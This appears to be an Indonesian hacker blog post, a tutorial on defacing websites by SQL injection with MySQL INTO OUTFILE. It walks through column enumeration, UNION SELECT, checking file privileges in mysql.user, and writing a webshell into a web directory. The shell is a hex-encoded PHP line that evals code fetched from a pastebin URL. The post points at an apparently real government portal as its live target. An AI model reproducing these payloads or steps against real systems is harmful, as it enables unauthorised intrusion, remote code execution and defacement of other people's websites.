Cara Deface Website
Menggunakan
Teknik Into Outfile
Kali ini gw mau kasih cara deface dengan teknik into outfile.. Into outfile sendiri artinya kita langsng up shell pada sebuah website tanpa harus menjadi admin dari web tersebut.. Gw juga akan kasih live targetnya.. Biar gk kelamaan langsng aja..
Live target :
Langkah pertama untuk mengecek vuln sql auto tidak pada sebuah website ktta beri tanda string (')..
Vuln gan.. Kemudian kita simpan tulisan C:\xampp\htdocs\portal_bpkpad\pages\single_page.php on line 149 dicatatan buat penempatan shell backdoor kita difinalnya:V"..
Next selanjutnya kembali ketarget kita
Disini kita cari angka cantiknya dulu ya
Klo masih eror berarti kita harus cari angkanya lg klo gak eror berarti itu lah angka cantiknya..
Trus cara mencari angka cantiknya bgaimana caranya?
Kita tambahkan +order+by+angkacantik--+
Contoh target kita
Kalaw masih seperti itu cari lagi sampe gk error..
Lahh kalaw sudah kembali seperti semula berarti itu angka cantiknya..
Trus klo kita udh dapat angka cantiknya, selanjutnya
Kita ganti yg +order+by+
Dengan +union+select+
Dan tambahkan angka dari 1 sampai angka cantiknya
Contoh
Kemudian kita tambahkan minus (-) diblkang id= contoh seperti digambar, fungsinya kita cari angka string user
Next selanjutnya kita cek usernya
Klo usernya root local berarti bisa di sql
Trus caranya bagaimana?
Kita ganti angka string usernya yg tadi angka 4 dengan user().. Liat gambar dibawah
Next selanjutnya kita cek lg permissonnya
Klo Y berarti bisa di sql
Klo N berarti tidak bisa disql
Trus caranya bagaimana?
Tinggal kita ganti lg yg user() menjadi file_priv
Berarti seperti ini
Trus tambahkan lg setelah angka cantik +from+mysql.user
Seperti ini
Maka disitu lah jawabannya bisa atau tidaknya..
Klo jawabanya Y berarti bisa disql. Kalaw N berarti tidak bisa ok..
Krna target kita jawabannya Y berarti bisa disql
Next selanjutnya kita hapus lg, kita kembalikan lg kesemula target kita
Seperti ini
Lalu kita tambahkan kode hexa shell atau uploader kita diangka string user
Ini angka hexa shell mini gw
0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e
Jadi seperti ini
Next selanjutnya kita tambahkan +INTO+OUTFILE'(Dir in yg tadi gw suruh simpan dinote)/namashell.php'
Contoh:
+INTO+OUTFILE'C:\xampp\htdocs\portal_bpkpad\pages/FALKA.php'
And jngan lupa kita ubah stringnya dari ini \ menjadi /
Mka akan seperti ini:
+INTO+OUTFILE'C:/xampp/htdocs/portal_bpkpad/pages/FALKA.php'
Kita tambahkan setelah angka cantik tadi
Nah klo sudah tinggal kita masuk ke dirnya targetnya ajj deh
Lahh udh ketanem shellnya.. Kalaw udh gitu you know lah tinggal apa:V"..
Kwkwkkwkkkw.. Susah? Yah emng gan.. Pkoknya banyak" baca + praktek..
Thanks.. See You In Next Post
#Share and coment
0 komentar:
Posting Komentar